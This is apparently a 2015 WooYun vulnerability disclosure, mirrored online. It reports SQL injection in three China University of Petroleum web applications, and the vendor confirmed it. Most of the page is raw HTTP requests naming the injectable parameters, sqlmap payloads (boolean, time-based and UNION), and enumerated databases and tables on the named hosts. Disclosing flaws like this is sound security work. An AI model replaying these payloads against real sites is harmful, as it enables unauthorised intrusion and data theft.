乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-12-03: 细节向核心白帽子及相关领域专家公开 2015-12-13: 细节向普通白帽子公开 2015-12-23: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
1.
http://gis.upc.edu.cn/
POST /list.php HTTP/1.1Content-Length: 64Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://gis.upc.edu.cnHost: gis.upc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*id=A&mapstyle=3d
id参数存在注入
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=A' AND 2473=2473 AND 'dLxg'='dLxg&mapstyle=3d Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=A' AND (SELECT * FROM (SELECT(SLEEP(5)))ARmn) AND 'lrBi'='lrBi&mapstyle=3d Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=A' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a706271,0x67424e4756504d755a56634a66785550585a76635a7654757871737561534c63636f6f53524a7868,0x7162627071)-- -&mapstyle=3d---web application technology: PHP 5.4.0, Apache 2.2.22back-end DBMS: MySQL 5.0.12
---web application technology: PHP 5.4.0, Apache 2.2.22back-end DBMS: MySQL 5.0.12available databases [5]:[*] gis[*] information_schema[*] mysql[*] performance_schema[*] test
---web application technology: PHP 5.4.0, Apache 2.2.22back-end DBMS: MySQL 5.0.12Database: gis+----------+---------+| Table | Entries |+----------+---------+| unit | 232 || building | 46 |+----------+---------+
2。
GET /dzjs/web1/lmcode.asp?fs=5&lm=128&ord=asc HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://jpkc.upc.edu.cnCookie: ASPSESSIONIDSASSCQCC=EPMBNOMBNJILHBBAPKKCDBGK; ASPSESSIONIDQATQCQDD=KKBENGLBGIHICLLEODCGIBKK; %CE%EF%C0%ED%CA%B5%D1%E9%D1%A7%CF%B0%CD%F8%D5%BE=Skin=; ASPSESSIONIDSATQCQDD=MKBENGLBBGKFHBCEBINKCMGO; reglevel=; fullname=; purview=; UserName=; KEY=; content=; CNZZDATA2983488=cnzz_eid%3D1346510288-1447852925-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447852925; sdmenu_my_menu=001; cod=2.7; csd=10Host: jpkc.upc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
sqlmap resumed the following injection point(s) from stored session:---Parameter: lm (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fs=5&lm=128 AND 3383=3383&ord=asc---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: MySQL 5current user: Nonecurrent database: Nonecurrent user is DBA: True
3.
中国石油大学讲座网 http://lecture.upc.edu.cn
POST /index.php?s=/Home/Article/search.html HTTP/1.1Content-Length: 178Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://lecture.upc.edu.cnCookie: PHPSESSID=41a8a364rrvs24nhhesk0n48t2; onethink_home_history=think%3A%7B%22t1447850802%22%3A%22%257B%2522name%2522%253A%2522%255Cu5927%255Cu5b66%255Cu751f%255Cu5fc3%255Cu7406%255Cu53d1%255Cu5c55%2522%252C%2522id%2522%253A%252222%2522%252C%2522cover_id%2522%253A%252211%2522%257D%22%7D; Hm_lvt_d8805ffa4435c9dd63a0aafa73e79573=1447851185,1447851185,1447851185; Hm_lpvt_d8805ffa4435c9dd63a0aafa73e79573=1447851185; HMACCOUNT=BCF7C5391584366D; bdshare_firstime=1447851245627Host: lecture.upc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*order=1&q=1&time=all&type=all
order参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: order (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: order=1 RLIKE (SELECT (CASE WHEN (5345=5345) THEN 1 ELSE 0x28 END))&q=1&time=all&type=all---back-end DBMS: MySQL 5available databases [5]:[*] cms[*] information_schema[*] mysql[*] performance_schema[*] test
---back-end DBMS: MySQL 5Database: cms+-----------------------+---------+| Table | Entries |+-----------------------+---------+| cms_play_history | 68317 || cms_search | 5893 || cms_action_log | 4213 || cms_ucenter_member | 2406 || cms_member | 2405 || cms_digg | 553 || cms_document | 553 || cms_picture | 553 || cms_document_vod | 538 || cms_auth_rule | 239 || cms_menu | 130 || cms_online | 112 || cms_attribute | 65 || cms_config | 55 || cms_comment | 30 || cms_favorite | 26 || cms_addons | 17 || cms_category | 17 || cms_auth_extend | 16 || cms_hooks | 16 || cms_document_live | 15 || cms_action | 11 || cms_silde | 11 || cms_channel | 7 || cms_model | 6 || cms_auth_group | 3 || cms_auth_group_access | 3 || cms_pages | 3 || cms_suggestions | 3 || cms_links | 2 || cms_server | 2 |+-----------------------+---------+
4.
危害等级:中
漏洞Rank:8
确认时间:2015-11-23 15:33
感谢您对学校的网络安全的关注,我们会尽快解决该问题。
暂无